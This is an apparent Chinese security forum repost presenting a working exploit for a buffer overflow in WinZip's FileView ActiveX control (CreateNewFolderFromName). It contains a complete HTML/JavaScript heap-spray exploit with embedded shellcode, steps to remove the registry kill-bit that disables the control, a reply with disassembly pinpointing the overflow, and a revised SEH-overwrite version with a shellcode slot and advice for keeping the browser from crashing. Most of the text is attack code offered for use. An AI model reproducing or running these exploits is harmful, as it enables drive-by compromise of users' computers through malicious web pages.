winzip FileView ActiveX Contorls CreateNewFolderFromName溢出exploit

来源:Ph4nt0m
作者: hahar

之前看到过一个FileView ActiveX控件溢出的,不过不是这个函数,网上公布的溢出代码也不是很好用,
这个是CreateNewFolderFromName函数溢出的,不过由于前面一个漏洞的问题,微软似乎禁用了这个控件,
测试时可以删除
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A09AE68F-B14D-43ED-B713

-BA413F034904}]
"Compatibility Flags"=dword:00000400
元旦快乐!

</body>
</html>
<head>
<object classid="clsid:{A09AE68F-B14D-43ED-B713-BA413F034904}" id="winzip">
</object>
</head>

<body>

<SCRIPT language="javascript">
/*
---===[ winzip-exploit.html

XiaoHui : 76693223[at]163.com
HomePage: <a href="http://www.nipc.org.cn" target="_blank">www.nipc.org.cn</a>
(c) 2006 All rights reserved.
note:Because of the prior vuln in FileView ActiveX Control,Micorsoft has disabled this ActiveX Controls,
To test this vuln,You can delete the key:
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{A09AE68F-B14D-43ED-B713

-BA413F034904}]
"Compatibility Flags"=dword:00000400
I have test the exploit on Windows 2000+sp4(CN) and Windows xp+sp2(CN) and Winzip 10.0(6667),you can try

other version,goodluck~
]===---
*/

var heapSprayToAddress = 0x0d0d0d0d;

var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%

u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%

u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%

u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");

var heapBlockSize = 0x400000;

var payLoadSize = payLoadCode.length * 2;

var spraySlideSize = heapBlockSize - (payLoadSize+0x38);

var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);

heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

memory = new Array();

for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}

var xh = 'A';
while (xh.length < 231) xh+='A';
xh+="x0dx0dx0dx0d";
winzip.CreateNewFolderFromName(xh);
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

</script>

</body>
</html>

刺 的回帖:
分析了一下:

03F03938 55 PUSH EBP
03F03939 8BEC MOV EBP,ESP
03F0393B 81EC 70020000 SUB ESP,270
03F03941 53 PUSH EBX
03F03942 56 PUSH ESI
03F03943 8BF1 MOV ESI,ECX
03F03945 33DB XOR EBX,EBX
03F03947 57 PUSH EDI
03F03948 8B86 3C030000 MOV EAX,DWORD PTR DS:[ESI+33C]
03F0394E 3BC3 CMP EAX,EBX
03F03950 74 58 JE SHORT wzfilvw.03F039AA
03F03952 68 08080200 PUSH 20808 ; UNICODE "ExplorerIEXPLORE.EXE"
03F03957 8D8D 90FDFFFF LEA ECX,DWORD PTR SS:[EBP-270]
03F0395D 68 60010000 PUSH 160
03F03962 51 PUSH ECX
03F03963 BF 00000040 MOV EDI,40000000
03F03968 53 PUSH EBX
03F03969 50 PUSH EAX
03F0396A 89BD 98FDFFFF MOV DWORD PTR SS:[EBP-268],EDI
03F03970 FF15 C0E3F303 CALL DWORD PTR DS:[<&SHELL32.SHGetFileIn>; SHELL32.SHGetFileInfoA
03F03976 85BD 98FDFFFF TEST DWORD PTR SS:[EBP-268],EDI
03F0397C 0F84 7D010000 JE wzfilvw.03F03AFF
03F03982 FFB6 48030000 PUSH DWORD PTR DS:[ESI+348]
03F03988 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110]
03F0398E 50 PUSH EAX
03F0398F 68 00800000 PUSH 8000
03F03994 FFB6 3C030000 PUSH DWORD PTR DS:[ESI+33C]
03F0399A FFB6 44030000 PUSH DWORD PTR DS:[ESI+344]
03F039A0 E8 4CA80000 CALL wzfilvw.03F0E1F1
03F039A5 83C4 14 ADD ESP,14
03F039A8 EB 38 JMP SHORT wzfilvw.03F039E2
03F039AA 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C]
03F039AD 50 PUSH EAX
03F039AE 53 PUSH EBX
03F039AF FFB6 D0010000 PUSH DWORD PTR DS:[ESI+1D0]
03F039B5 FF15 CCE3F303 CALL DWORD PTR DS:[<&SHELL32.SHGetSpecia>; SHELL32.SHGetSpecialFolderLocation
03F039BB 85C0 TEST EAX,EAX
03F039BD 0F85 3C010000 JNZ wzfilvw.03F03AFF
03F039C3 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110]
03F039C9 50 PUSH EAX
03F039CA FF75 F4 PUSH DWORD PTR SS:[EBP-C]
03F039CD FF15 D0E3F303 CALL DWORD PTR DS:[<&SHELL32.SHGetPathFr>; SHELL32.SHGetPathFromIDListA
03F039D3 8B86 48030000 MOV EAX,DWORD PTR DS:[ESI+348]
03F039D9 FF75 F4 PUSH DWORD PTR SS:[EBP-C]
03F039DC 8B08 MOV ECX,DWORD PTR DS:[EAX]
03F039DE 50 PUSH EAX
03F039DF FF51 14 CALL DWORD PTR DS:[ECX+14]
03F039E2 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110]
03F039E8 50 PUSH EAX
03F039E9 E8 F2BA0100 CALL wzfilvw.03F1F4E0
03F039EE 8BF8 MOV EDI,EAX
03F039F0 59 POP ECX
03F039F1 80BC3D EFFEFFFF>CMP BYTE PTR SS:[EBP+EDI-111],5C
03F039F9 74 14 JE SHORT wzfilvw.03F03A0F
03F039FB 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110]
03F03A01 68 14FAF403 PUSH wzfilvw.03F4FA14
03F03A06 50 PUSH EAX
03F03A07 E8 F4B90100 CALL wzfilvw.03F1F400
03F03A0C 59 POP ECX
03F03A0D 47 INC EDI
03F03A0E 59 POP ECX
03F03A0F FF75 08 PUSH DWORD PTR SS:[EBP+8]
03F03A12 8D843D F0FEFFFF LEA EAX,DWORD PTR SS:[EBP+EDI-110]
03F03A19 50 PUSH EAX
03F03A1A E8 E1B90100 CALL wzfilvw.03F1F400 ;在这里溢出了

修改了一下LZ核心代码使得更加通用


</body>
</html>
<head>
<object classid="clsid:{A09AE68F-B14D-43ED-B713-BA413F034904}" id="winzip">
</object>
</head>

<body>

<SCRIPT language="javascript">

var axis = 0xdeadbeef;

var payLoadCode = unescape("%uPut Your Shellcode Here!");

var heapSprayToAddress = 0x0c010101;

var payLoadSize = payLoadCode.length * 2;

var spraySlide = unescape("%u9090%u9090");

var heapBlockSize = 0x100000;

var spraySlideSize = heapBlockSize - (payLoadSize+0x38);

spraySlide = get_SpraySlide(spraySlide,spraySlideSize);

heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;

memory = new Array();

for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}

function get_SpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

</script>

<script>
function fuck()
{
var xh = 'A';
while (xh.length < 243) xh+='A';
while (xh.length < 433)
xh+="\x0c\x0c\x0c\x0c";
winzip.CreateNewFolderFromName(xh);
}
</script>

<script>java script:fuck();</script>

</body>
</html>

因为这个漏洞也跟系统的目录有关,而在不同系统上目录可能会不一样,所以不通用,故改为了覆盖seh的方式,让xh的值一路覆盖到433个bytes,保证覆盖了seh

在shellcode最后使用

add esp, 12ch
pop ebp
retn 1ch

可以恢复栈平衡,以达到不挂ie的效果。
另外winzip这个东西会有时候会弹出个窗口。
PS:难怪我调试以前那个winzip的漏洞时触发不了,原来是被MS禁用了

相关日志

楼被抢了 2 层了... 抢座Rss 2.0或者 Trackback

发表评论